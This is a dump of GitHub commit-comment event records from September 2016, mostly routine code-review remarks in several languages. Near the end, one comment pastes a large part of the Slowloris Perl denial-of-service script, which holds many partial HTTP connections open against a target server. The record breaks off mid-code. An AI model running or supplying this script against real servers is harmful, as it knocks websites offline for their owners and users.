{"id":"4579748548","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070311,"position":23,"line":71,"path":"login.php","commit_id":"3ba5d9bae173380c12dead964dc3669275f05519","created_at":"2016-09-18T11:15:54Z","updated_at":"2016-09-18T11:15:54Z","body":"ここはsprintfじゃなくていつも通りにする"}},"created_at":"2016-09-18T11:15:54Z"}
{"id":"4579748991","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070312,"position":39,"line":86,"path":"login.php","commit_id":"3ba5d9bae173380c12dead964dc3669275f05519","created_at":"2016-09-18T11:16:10Z","updated_at":"2016-09-18T11:16:10Z","body":"ここもsprintfじゃなくていつもどおりにする"}},"created_at":"2016-09-18T11:16:10Z"}
{"id":"4579749033","type":"CommitCommentEvent","actor":{"login":"haixoay96"},"repo":{"name":"haixoay96/appChatClientAndroid"},"payload":{"comment":{"id":19070313,"position":null,"line":null,"path":null,"commit_id":"0e9baec1306a3e95d08b2b18fd74e9045fd4018d","created_at":"2016-09-18T11:16:11Z","updated_at":"2016-09-18T11:16:11Z","body":"first commit"}},"created_at":"2016-09-18T11:16:11Z"}
{"id":"4579749486","type":"CommitCommentEvent","actor":{"login":"zensh"},"repo":{"name":"thunks/thunks"},"payload":{"comment":{"id":19070315,"position":104,"line":54,"path":"thunks.d.ts","commit_id":"408db6caff39e529ed2f036a4c3e2c7ab42db04a","created_at":"2016-09-18T11:16:27Z","updated_at":"2016-09-18T11:16:27Z","body":"@Brooooooklyn 奇怪，不能重载"}},"created_at":"2016-09-18T11:16:27Z"}
{"id":"4579755374","type":"CommitCommentEvent","actor":{"login":"Andrew-0"},"repo":{"name":"Andrew-0/r1"},"payload":{"comment":{"id":19070329,"position":4,"line":4,"path":"test.py","commit_id":"945a77bc4d30eff158a5e718a56773a8243e9d1e","created_at":"2016-09-18T11:20:40Z","updated_at":"2016-09-18T11:20:40Z","body":"#comment"}},"created_at":"2016-09-18T11:20:40Z"}
{"id":"4579756622","type":"CommitCommentEvent","actor":{"login":"vijeth-aradhya"},"repo":{"name":"vijeth-aradhya/addons-server"},"payload":{"comment":{"id":19070333,"position":null,"line":null,"path":null,"commit_id":"4f8905efe88df343cb2099d96362a743963df123","created_at":"2016-09-18T11:21:42Z","updated_at":"2016-09-18T11:21:42Z","body":"Made changes to .disabled [color] so that 'view other versions' is displayed in blue -\r\n\r\n![view-other-versions-bugfix](https://cloud.githubusercontent.com/assets/15227565/18615273/05841ef0-7dc0-11e6-960c-dc43aad6004b.png)\r\n\r\nLooking for a better way to change it."}},"created_at":"2016-09-18T11:21:42Z"}
{"id":"4579756686","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"ArchRPG/ARCore"},"payload":{"comment":{"id":19070334,"position":null,"line":null,"path":null,"commit_id":"96bef15df867ddbb5b8b6f1dfde2be8e08abc73b","created_at":"2016-09-18T11:21:46Z","updated_at":"2016-09-18T11:21:46Z","body":"Actually, we already have that on Genisys @@"}},"created_at":"2016-09-18T11:21:46Z"}
{"id":"4579757374","type":"CommitCommentEvent","actor":{"login":"Davide87d"},"repo":{"name":"Davide87d/test"},"payload":{"comment":{"id":19070335,"position":1,"line":1,"path":"README.md","commit_id":"8e4f44998e6599aa99b12c91ad314bdcddbe2e12","created_at":"2016-09-18T11:22:22Z","updated_at":"2016-09-18T11:22:22Z","body":"commento"}},"created_at":"2016-09-18T11:22:22Z"}
{"id":"4579757779","type":"CommitCommentEvent","actor":{"login":"Buruz"},"repo":{"name":"Buruz/Hello"},"payload":{"comment":{"id":19070336,"position":null,"line":null,"path":null,"commit_id":"30d50776c2f97b11f84e4d3180d6f656d9c38c96","created_at":"2016-09-18T11:22:43Z","updated_at":"2016-09-18T11:22:43Z","body":"up"}},"created_at":"2016-09-18T11:22:43Z"}
{"id":"4579759729","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19070344,"position":null,"line":null,"path":null,"commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-18T11:24:13Z","updated_at":"2016-09-18T11:24:13Z","body":"You're right about making `prox!` parametric. For the `@inbounds` and other macros, I would say to postpone further optimizations and to focus now on the most efficient way to write the code.\r\n\r\nAs Donald Knuth once said: \"premature optimization is the root of all evil (or at least most of it) in programming\"."}},"created_at":"2016-09-18T11:24:13Z"}
{"id":"4579761391","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/teutoburg"},"payload":{"comment":{"id":19070345,"position":null,"line":null,"path":null,"commit_id":"dce5ec3d148866156764f1a0b5d4f31b7df1e040","created_at":"2016-09-18T11:25:25Z","updated_at":"2016-09-18T11:25:25Z","body":"This is not a merge. You just deleted the readme, removed the hermannsschlach image, and added a temporary lock file. *derp*\r\n\r\nPlease do:\r\n```\r\n\r\n```"}},"created_at":"2016-09-18T11:25:25Z"}
{"id":"4579761523","type":"CommitCommentEvent","actor":{"login":"kobtsev"},"repo":{"name":"Shkaf/Labs"},"payload":{"comment":{"id":19070346,"position":26,"line":25,"path":"CadDev/CadDevLab1/Program.cs","commit_id":"503df9ae57dda26c962556e513d9b933b7f332d0","created_at":"2016-09-18T11:25:30Z","updated_at":"2016-09-18T11:25:30Z","body":"не наглядное формирование изображения, можно поправить с помощью инициализаторов или паттерна строитель"}},"created_at":"2016-09-18T11:25:30Z"}
{"id":"4579762341","type":"CommitCommentEvent","actor":{"login":"witgo"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19070347,"position":163,"line":811,"path":"core/src/main/scala/org/apache/spark/storage/memory/MemoryStore.scala","commit_id":"8faa5217b44e8d52eab7eb2d53d0652abaaf43cd","created_at":"2016-09-18T11:26:08Z","updated_at":"2016-09-18T11:26:08Z","body":"@JoshRosen  `os` needs to be automatically close?\r\n\r\n```scala\r\n// diskStore.put will close the fileOutputStream\r\ndiskStore.put(blockId) { fileOutputStream =>\r\n     partiallySerializedValues.finishWritingToStream(fileOutputStream)\r\n }\r\n```"}},"created_at":"2016-09-18T11:26:08Z"}
{"id":"4579763260","type":"CommitCommentEvent","actor":{"login":"z13052hn"},"repo":{"name":"minimaru/team_project"},"payload":{"comment":{"id":19070349,"position":null,"line":null,"path":null,"commit_id":"f9a396bccd0a7e274e367de005cd14d508569b0f","created_at":"2016-09-18T11:26:50Z","updated_at":"2016-09-18T11:26:50Z","body":"Bootstrapのファイルをダウンロードせずに直接Webを参照すればよかったんですね。\r\n会社だと社外にあるファイルを参照するように書かないので思いつきませんでした。"}},"created_at":"2016-09-18T11:26:50Z"}
{"id":"4579764826","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070350,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:28:08Z","updated_at":"2016-09-18T11:28:08Z","body":"So we are not going to work on the same hardware tree anymore, isn't it?"}},"created_at":"2016-09-18T11:28:08Z"}
{"id":"4579765660","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/Homework-materials"},"payload":{"comment":{"id":19070351,"position":null,"line":null,"path":null,"commit_id":"2a115d690ca6becef85d3e4a3d8039502376f670","created_at":"2016-09-18T11:28:51Z","updated_at":"2016-09-18T11:28:51Z","body":"\r\n[homework1.txt](https://github.com/Guozhongzhi/Homework-materials/files/478670/homework1.txt)\r\n"}},"created_at":"2016-09-18T11:28:51Z"}
{"id":"4579765758","type":"CommitCommentEvent","actor":{"login":"z13052hn"},"repo":{"name":"minimaru/team_project"},"payload":{"comment":{"id":19070352,"position":null,"line":null,"path":null,"commit_id":"660a3f302902a7309f786a8705c33ce60f5f1920","created_at":"2016-09-18T11:28:55Z","updated_at":"2016-09-18T11:28:55Z","body":"heightの値はセンチメートルではなくメートルで計算しないと値が正しくないと思います。\r\nそれかセンチメートルでもらって最後に10,000を書ける必要があるのでは？"}},"created_at":"2016-09-18T11:28:55Z"}
{"id":"4579767455","type":"CommitCommentEvent","actor":{"login":"JasonQSY"},"repo":{"name":"SSTIA/weekly-quiz"},"payload":{"comment":{"id":19070356,"position":6,"line":16,"path":"quiz/handler/hello.py","commit_id":"d6c9cf4cbe37897d84d27be30f2d3cc44e393271","created_at":"2016-09-18T11:30:12Z","updated_at":"2016-09-18T11:30:12Z","body":"judge the id by `/quiz/{id}` is also ok. It depends on the back-end."}},"created_at":"2016-09-18T11:30:12Z"}
{"id":"4579767764","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19070357,"position":24,"line":48,"path":"src/functions/normL1.jl","commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-18T11:30:24Z","updated_at":"2016-09-18T11:30:24Z","body":"Yes, it is. We basically soft-threshold the modulus of each component of x, and then scale by what comes out the \"direction\" in C the number points to, which is like the sign in R. I'm quite sure about this, you just need to see what are the L1-norm and the squared L2-norm in C to obtain this closed form."}},"created_at":"2016-09-18T11:30:24Z"}
{"id":"4579768654","type":"CommitCommentEvent","actor":{"login":"zhanhb"},"repo":{"name":"ultraq/thymeleaf-layout-dialect"},"payload":{"comment":{"id":19070358,"position":null,"line":null,"path":null,"commit_id":"6b704157bde69d6ee79f267897ebdbd7e4bc94f8","created_at":"2016-09-18T11:31:02Z","updated_at":"2016-09-18T11:31:02Z","body":"IMO, LinkedHashMap is not a good way to storage  data as a cache. ConcurrentHashMap should be perferred."}},"created_at":"2016-09-18T11:31:02Z"}
{"id":"4579769001","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/Homework-materials"},"payload":{"comment":{"id":19070359,"position":null,"line":null,"path":null,"commit_id":"2a115d690ca6becef85d3e4a3d8039502376f670","created_at":"2016-09-18T11:31:17Z","updated_at":"2016-09-18T11:31:17Z","body":"```  Python\r\nprint r\"\"\"\r\n # # # #              # # # # #  #                        # # # # #  #      #\r\n#                           #    #                              #    #\r\n#    ### #   #  # #       #      # # #   # #   # #   # #      #      # # #  #\r\n#      # #   # #   #    #        #   #  #   # #   # #  #    #        #   #  #\r\n # # # #  # #   # #   # # # # #  #   #   # #  #   #  # #  # # # # #  #   #  #\r\n                                                       # \r\n                                                    # # \r\n\"\"\"\r\n```"}},"created_at":"2016-09-18T11:31:17Z"}
{"id":"4579769672","type":"CommitCommentEvent","actor":{"login":"justpushCar"},"repo":{"name":"bryaneaton13/react-pull-to-refresh"},"payload":{"comment":{"id":19070360,"position":null,"line":null,"path":null,"commit_id":"e14762e29f2ea51280f47b2bffc8dd46c75fda0e","created_at":"2016-09-18T11:31:49Z","updated_at":"2016-09-18T11:31:49Z","body":"how to  add more in zhe end  "}},"created_at":"2016-09-18T11:31:49Z"}
{"id":"4579771152","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070361,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:33:09Z","updated_at":"2016-09-18T11:33:09Z","body":"Conflict actually, it said libstagefrighthw already defined for sc8830\n\nSo I deleted for time being. Any better solution?\n\nOn Sep 18, 2016 4:58 PM, \"Quang Ngô\" <notifications@github.com> wrote:\n\n> So we are not going to work on the same hardware tree anymore, isn't it?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/1b02e6071fad853a96e4c6cc5343ed0a231a9e9d#commitcomment-19070350>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKM-vbIyuyhBrukUDBUnYldXuINcMHYWks5qrSBIgaJpZM4J_4Iw>\n> .\n>\n"}},"created_at":"2016-09-18T11:33:09Z"}
{"id":"4579771385","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19070362,"position":null,"line":null,"path":null,"commit_id":"45bc17d41b40f271dd5ebb2357e7f3564f969007","created_at":"2016-09-18T11:33:21Z","updated_at":"2016-09-18T11:33:21Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/45bc17d41b40f271dd5ebb2357e7f3564f969007#commitcomment-19070185) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/b6cebbd7dcf0a99752ad3703c8561e14739153dd/daily_2016_9_18/report.md). cc @jrevels"}},"created_at":"2016-09-18T11:33:21Z"}
{"id":"4579772068","type":"CommitCommentEvent","actor":{"login":"fur6y"},"repo":{"name":"0nse/dotfiles"},"payload":{"comment":{"id":19070363,"position":null,"line":null,"path":null,"commit_id":"e20d14d599993c2b63cd5db37b1866d67198d8d6","created_at":"2016-09-18T11:33:58Z","updated_at":"2016-09-18T11:33:58Z","body":":thumbsup:"}},"created_at":"2016-09-18T11:33:58Z"}
{"id":"4579772093","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070364,"position":13,"line":13,"path":"login.php","commit_id":"23b44aeb15a8cff4f758ff4ea75035f37a892b8e","created_at":"2016-09-18T11:33:58Z","updated_at":"2016-09-18T11:33:58Z","body":"まずはここから"}},"created_at":"2016-09-18T11:33:58Z"}
{"id":"4579773251","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070367,"position":11,"line":12,"path":"login.php","commit_id":"23b44aeb15a8cff4f758ff4ea75035f37a892b8e","created_at":"2016-09-18T11:34:55Z","updated_at":"2016-09-18T11:34:55Z","body":"まずはここから↓"}},"created_at":"2016-09-18T11:34:55Z"}
{"id":"4579773438","type":"CommitCommentEvent","actor":{"login":"ITE03050362"},"repo":{"name":"ITE03050362/-Lab02"},"payload":{"comment":{"id":19070368,"position":null,"line":null,"path":null,"commit_id":"d564a463a050017fdd8d0b46dabe166f11e71247","created_at":"2016-09-18T11:35:04Z","updated_at":"2016-09-18T11:35:04Z","body":"Hello, github!"}},"created_at":"2016-09-18T11:35:04Z"}
{"id":"4579774246","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070369,"position":13,"line":13,"path":"login.php","commit_id":"23b44aeb15a8cff4f758ff4ea75035f37a892b8e","created_at":"2016-09-18T11:35:49Z","updated_at":"2016-09-18T11:35:49Z","body":"まずはここから↓"}},"created_at":"2016-09-18T11:35:49Z"}
{"id":"4579775339","type":"CommitCommentEvent","actor":{"login":"rzxz2016"},"repo":{"name":"rzxz2016/rzxz2016"},"payload":{"comment":{"id":19070371,"position":null,"line":null,"path":null,"commit_id":"9ac6bb65b48779fc082313c2089fd5c5f9a74746","created_at":"2016-09-18T11:36:46Z","updated_at":"2016-09-18T11:36:46Z","body":">今天分享三个超好用的Markdown技巧。\r\n\r\n## Copy as markdown\r\n如果你经常需要写一些资源列表性质的文章，发给同事或客户。最简单的办法是，打开这些网页，放在一个独立的Chrome浏览器窗口里面，然后安装好插件：【Copy as markdown】，选择【All Tabs as List】，唰！漂亮的资源列表就生成了！\r\n\r\n当然，如果你厌倦手动写Markdown链接了，也可以用这个方法。选择：【Current Tab】的第一行即可。\r\n\r\n## Copy As Markdown\r\n\r\nMarkdown写邮件\r\n如果你习惯用Markdown了，那么，装上Chrome插件Markdown here，在gmail撰写邮件界面，写好后，轻轻一点，你的邮件就变成漂亮的文档了。\r\n\r\n邮件撰写前："}},"created_at":"2016-09-18T11:36:46Z"}
{"id":"4579775511","type":"CommitCommentEvent","actor":{"login":"h289864"},"repo":{"name":"h289864/rep"},"payload":{"comment":{"id":19070372,"position":null,"line":null,"path":null,"commit_id":"93d24e6199fcf25caef7c8fd6fab116b1a927644","created_at":"2016-09-18T11:36:56Z","updated_at":"2016-09-18T11:36:56Z","body":"spliitted"}},"created_at":"2016-09-18T11:36:56Z"}
{"id":"4579776088","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070375,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:37:23Z","updated_at":"2016-09-18T11:37:23Z","body":"What kind of conflict? Doesn't Android.mk guard against it?"}},"created_at":"2016-09-18T11:37:23Z"}
{"id":"4579777110","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070378,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:38:13Z","updated_at":"2016-09-18T11:38:13Z","body":"It should, for some reason it didn't\n\nOn Sep 18, 2016 5:07 PM, \"Quang Ngô\" <notifications@github.com> wrote:\n\n> What kind of conflict? Doesn't Android.mk guard against it?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/1b02e6071fad853a96e4c6cc5343ed0a231a9e9d#commitcomment-19070375>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKM-vYg4PJGiZxBtmii7rsu74zJT-ToQks5qrSJzgaJpZM4J_4Iw>\n> .\n>\n"}},"created_at":"2016-09-18T11:38:13Z"}
{"id":"4579778138","type":"CommitCommentEvent","actor":{"login":"kangtan"},"repo":{"name":"llaera/slowloris.pl"},"payload":{"comment":{"id":19070380,"position":8,"line":8,"path":"slowloris.pl","commit_id":"61d4dec089a507c10511d758ac0fa74ebe7aa373","created_at":"2016-09-18T11:39:09Z","updated_at":"2016-09-18T11:39:09Z","body":"sd"}},"created_at":"2016-09-18T11:39:09Z"}
{"id":"4579778327","type":"CommitCommentEvent","actor":{"login":"NPellet"},"repo":{"name":"NPellet/jsGraph"},"payload":{"comment":{"id":19070381,"position":null,"line":null,"path":null,"commit_id":"47b759cb722d78cd6fd7f4cd6f6a6e9403b32e79","created_at":"2016-09-18T11:39:18Z","updated_at":"2016-09-18T11:39:18Z","body":"@targos, comments ?\r\n\r\nThe idea is to use\r\n\r\ngraph.newSerie(\"someName\", someOptions, Graph.SERIE_SCATTER );\r\ninstead of\r\ngraph.newSerie(\"someName\", someOptions, \"scatter\" );\r\n\r\nThis should be backward compatible, though."}},"created_at":"2016-09-18T11:39:18Z"}
{"id":"4579780587","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070383,"position":24,"line":22,"path":"login.php","commit_id":"23b44aeb15a8cff4f758ff4ea75035f37a892b8e","created_at":"2016-09-18T11:41:01Z","updated_at":"2016-09-18T11:41:01Z","body":"取得したmember_idと時間をセッションに保存する\r\n→次のindex.phpで使うため"}},"created_at":"2016-09-18T11:41:01Z"}
{"id":"4579781489","type":"CommitCommentEvent","actor":{"login":"amapeters"},"repo":{"name":"amapeters/metteTest"},"payload":{"comment":{"id":19070385,"position":null,"line":null,"path":null,"commit_id":"0a45b4fe9768bd1ea8a5d7d5473ce57d63b724c6","created_at":"2016-09-18T11:41:47Z","updated_at":"2016-09-18T11:41:47Z","body":"commit 2"}},"created_at":"2016-09-18T11:41:47Z"}
{"id":"4579783485","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070387,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:43:28Z","updated_at":"2016-09-18T11:43:28Z","body":"Maybe the out dir is dirty?"}},"created_at":"2016-09-18T11:43:28Z"}
{"id":"4579784801","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070389,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T11:44:39Z","updated_at":"2016-09-18T11:44:39Z","body":"It should not build libstagefrighthw for sc8810 before adding our codes.\nAnyway I will fix that soon.\n\nOn Sep 18, 2016 5:13 PM, \"Quang Ngô\" <notifications@github.com> wrote:\n\n> Maybe the out dir is dirty?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/1b02e6071fad853a96e4c6cc5343ed0a231a9e9d#commitcomment-19070387>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKM-vV6jecmBTxeBmcGZT7sUbQaGpxtsks5qrSPggaJpZM4J_4Iw>\n> .\n>\n"}},"created_at":"2016-09-18T11:44:39Z"}
{"id":"4579786642","type":"CommitCommentEvent","actor":{"login":"M4tt30rru"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19070392,"position":null,"line":null,"path":null,"commit_id":"e596dae327b445718022689926174307616b3d91","created_at":"2016-09-18T11:46:06Z","updated_at":"2016-09-18T11:46:06Z","body":"I am afraid the commit is not very descriptive. That's because at first I was committing the methods separately. The new methods are actually two, of which the one that counts the number of imports is mostly useful to test the results, we can get rid of it. There is another one (countNoImport) that counts the nodes discarding the ImportDeclarations, that is actually more useful."}},"created_at":"2016-09-18T11:46:06Z"}
{"id":"4579789558","type":"CommitCommentEvent","actor":{"login":"kangtan"},"repo":{"name":"llaera/slowloris.pl"},"payload":{"comment":{"id":19070394,"position":8,"line":10,"path":"README","commit_id":"2c33f10090ca749cf5e59a24331286fbc4cc9e71","created_at":"2016-09-18T11:48:31Z","updated_at":"2016-09-18T11:48:31Z","body":"+#!/usr/bin/perl -w\r\n +use strict;\r\n +use IO::Socket::INET;\r\n +use IO::Socket::SSL;\r\n +use Getopt::Long;\r\n +use Config;\r\n +\r\n +$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors\r\n +\r\n +print <<EOTEXT;\r\n +Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris\r\n +EOTEXT\r\n +\r\n +my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );\r\n +my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );\r\n +my $result = GetOptions(\r\n +    'shost=s'   => \\$shost,\r\n +    'dns=s'     => \\$host,\r\n +    'httpready' => \\$httpready,\r\n +    'num=i'     => \\$connections,\r\n +    'cache'     => \\$cache,\r\n +    'port=i'    => \\$port,\r\n +    'https'     => \\$ssl,\r\n +    'tcpto=i'   => \\$tcpto,\r\n +    'test'      => \\$test,\r\n +    'timeout=i' => \\$timeout,\r\n +    'version'   => \\$version,\r\n +);\r\n +\r\n +if ($version) {\r\n +    print \"Version 0.7\\n\";\r\n +    exit;\r\n +}\r\n +\r\n +unless ($host) {\r\n +    print \"Usage:\\n\\n\\tperl $0 -dns [www.example.com] -options\\n\";\r\n +    print \"\\n\\tType 'perldoc $0' for help with options.\\n\\n\";\r\n +    exit;\r\n +}\r\n +\r\n +unless ($port) {\r\n +    $port = 80;\r\n +    print \"Defaulting to port 80.\\n\";\r\n +}\r\n +\r\n +unless ($tcpto) {\r\n +    $tcpto = 5;\r\n +    print \"Defaulting to a 5 second tcp connection timeout.\\n\";\r\n +}\r\n +\r\n +unless ($test) {\r\n +    unless ($timeout) {\r\n +        $timeout = 100;\r\n +        print \"Defaulting to a 100 second re-try timeout.\\n\";\r\n +    }\r\n +    unless ($connections) {\r\n +        $connections = 1000;\r\n +        print \"Defaulting to 1000 connections.\\n\";\r\n +    }\r\n +}\r\n +\r\n +my $usemultithreading = 0;\r\n +if ( $Config{usethreads} ) {\r\n +    print \"Multithreading enabled.\\n\";\r\n +    $usemultithreading = 1;\r\n +    use threads;\r\n +    use threads::shared;\r\n +}\r\n +else {\r\n +    print \"No multithreading capabilites found!\\n\";\r\n +    print \"Slowloris will be slower than normal as a result.\\n\";\r\n +}\r\n +\r\n +my $packetcount : shared     = 0;\r\n +my $failed : shared          = 0;\r\n +my $connectioncount : shared = 0;\r\n +\r\n +srand() if ($cache);\r\n +\r\n +if ($shost) {\r\n +    $sendhost = $shost;\r\n +}\r\n +else {\r\n +    $sendhost = $host;\r\n +}\r\n +if ($httpready) {\r\n +    $method = \"POST\";\r\n +}\r\n +else {\r\n +    $method = \"GET\";\r\n +}\r\n +\r\n +if ($test) {\r\n +    my @times = ( \"2\", \"30\", \"90\", \"240\", \"500\" );\r\n +    my $totaltime = 0;\r\n +    foreach (@times) {\r\n +        $totaltime = $totaltime + $_;\r\n +    }\r\n +    $totaltime = $totaltime / 60;\r\n +    print \"This test could take up to $totaltime minutes.\\n\";\r\n +\r\n +    my $delay   = 0;\r\n +    my $working = 0;\r\n +    my $sock;\r\n +\r\n +    if ($ssl) {\r\n +        if (\r\n +            $sock = new IO::Socket::SSL(\r\n +                PeerAddr => \"$host\",\r\n +                PeerPort => \"$port\",\r\n +                Timeout  => \"$tcpto\",\r\n +                Proto    => \"tcp\",\r\n +            )\r\n +          )\r\n +        {\r\n +            $working = 1;\r\n +        }\r\n +    }\r\n +    else {\r\n +        if (\r\n +            $sock = new IO::Socket::INET(\r\n +                PeerAddr => \"$host\",\r\n +                PeerPort => \"$port\",\r\n +                Timeout  => \"$tcpto\",\r\n +                Proto    => \"tcp\",\r\n +            )\r\n +          )\r\n +        {\r\n +            $working = 1;\r\n +        }\r\n +    }\r\n +    if ($working) {\r\n +        if ($cache) {\r\n +            $rand = \"?\" . int( rand(99999999999999) );\r\n +        }\r\n +        else {\r\n +            $rand = \"\";\r\n +        }\r\n +        my $primarypayload =\r\n +            \"GET /$rand HTTP/1.1\\r\\n\"\r\n +          . \"Host: $sendhost\\r\\n\"\r\n +          . \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\\r\\n\"\r\n +          . \"Content-Length: 42\\r\\n\";\r\n +        if ( print $sock $primarypayload ) {\r\n +            print \"Connection successful, now comes the waiting game...\\n\";\r\n +        }\r\n +        else {\r\n +            print\r\n +\"That's odd - I connected but couldn't send the data to $host:$port.\\n\";\r\n +            print \"Is something wrong?\\nDying.\\n\";\r\n +            exit;\r\n +        }\r\n +    }\r\n +    else {\r\n +        print \"Uhm... I can't connect to $host:$port.\\n\";\r\n +        print \"Is something wrong?\\nDying.\\n\";\r\n +        exit;\r\n +    }\r\n +    for ( my $i = 0 ; $i <= $#times ; $i++ ) {\r\n +        print \"Trying a $times[$i] second delay: \\n\";\r\n +        sleep( $times[$i] );\r\n +        if ( print $sock \"X-a: b\\r\\n\" ) {\r\n +            print \"\\tWorked.\\n\";\r\n +            $delay = $times[$i];\r\n +        }\r\n +        else {\r\n +            if ( $SIG{__WARN__} ) {\r\n +                $delay = $times[ $i - 1 ];\r\n +                last;\r\n +            }\r\n +            print \"\\tFailed after $times[$i] seconds.\\n\";\r\n +        }\r\n +    }\r\n +\r\n +    if ( print $sock \"Connection: Close\\r\\n\\r\\n\" ) {\r\n +        print \"Okay that's enough time. Slowloris closed the socket.\\n\";\r\n +        print \"Use $delay seconds for -timeout.\\n\";\r\n +        exit;\r\n +    }\r\n +    else {\r\n +        print \"Remote server closed socket.\\n\";\r\n +        print \"Use $delay seconds for -timeout.\\n\";\r\n +        exit;\r\n +    }\r\n +    if ( $delay < 166 ) {\r\n +        print <<EOSUCKS2BU;\r\n +Since the timeout ended up being so small ($delay seconds) and it generally \r\n +takes between 200-500 threads for most servers and assuming any latency at \r\n +all...  you might have trouble using Slowloris against this target.  You can \r\n +tweak the -timeout flag down to less than 10 seconds but it still may not \r\n +build the sockets in time.\r\n +EOSUCKS2BU\r\n +    }\r\n +}\r\n +else {\r\n +    print\r\n +\"Connecting to $host:$port every $timeout seconds with $connections sockets:\\n\";\r\n +\r\n +    if ($usemultithreading) {\r\n +        domultithreading($connections);\r\n +    }\r\n +    else {\r\n +        doconnections( $connections, $usemultithreading );\r\n +    }\r\n +}\r\n +\r\n +sub doconnections {\r\n +    my ( $num, $usemultithreading ) = @_;\r\n +    my ( @first, @sock, @working );\r\n +    my $failedconnections = 0;\r\n +    $working[$_] = 0 foreach ( 1 .. $num );    #initializing\r\n +    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing\r\n +    while (1) {\r\n +        $failedconnections = 0;\r\n +        print \"\\t\\tBuilding sockets.\\n\";\r\n +        foreach my $z ( 1 .. $num ) {\r\n +            if ( $working[$z] == 0 ) {\r\n +                if ($ssl) {\r\n +                    if (\r\n +                        $sock[$z] = new IO::Socket::SSL(\r\n +                            PeerAddr => \"$host\",\r\n +                            PeerPort => \"$port\",\r\n +                            Timeout  => \"$tcpto\",\r\n +                            Proto    => \"tcp\",\r\n +                        )\r\n +                      )\r\n +                    {\r\n +                        $working[$z] = 1;\r\n +                    }\r\n +                    else {\r\n +                        $working[$z] = 0;\r\n +                    }\r\n +                }\r\n +                else {\r\n +                    if (\r\n +                        $sock[$z] = new IO::Socket::INET(\r\n +                            PeerAddr => \"$host\",\r\n +                            PeerPort => \"$port\",\r\n +                            Timeout  => \"$tcpto\",\r\n +                            Proto    => \"tcp\",\r\n +                        )\r\n +                      )\r\n +                    {\r\n +                        $working[$z] = 1;\r\n +                        $packetcount = $packetcount + 3;  #SYN, SYN+ACK, 